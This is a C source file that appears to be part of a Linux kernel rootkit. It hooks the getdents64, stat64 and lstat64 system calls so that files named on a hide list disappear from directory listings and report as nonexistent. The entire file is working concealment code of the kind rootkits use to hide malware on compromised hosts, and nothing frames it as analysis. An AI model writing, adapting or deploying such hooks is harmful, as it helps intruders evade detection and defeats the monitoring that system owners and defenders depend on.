#include "syscalls.h"
#include "list.h"

asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

asmlinkage int (*original_stat64) (const char *path, struct stat64 *buf);
asmlinkage int (*original_lstat64) (const char *path, struct stat64 *buf);

asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count)
{
	int rtn;
	struct linux_dirent64 *cur = dirp;
	int i = 0;
	rtn = original_getdents64(fd, dirp, count);
	while (i < rtn) {
		if (lookupfilename(cur->d_name) == 1) {
			int reclen = cur->d_reclen;
			char *next_rec = (char *)cur + reclen;
			int len = (int)dirp + rtn - (int)next_rec;
			memmove(cur, next_rec, len);
			rtn -= reclen;
			continue;
		}
		i += cur->d_reclen;
		cur = (struct linux_dirent64*) ((char*)dirp + i);
	}
	return rtn;
}

asmlinkage int stat64_hook(const char *path, struct stat64 *buf)
{
	if ((extractfilename(path)) == 1)
		return -ENOENT;
	return original_stat64(path, buf);
}

asmlinkage int lstat64_hook(const char *path, struct stat64 *buf)
{
	if ((extractfilename(path)) == 1)
		return -ENOENT;
	return original_lstat64(path, buf);
}
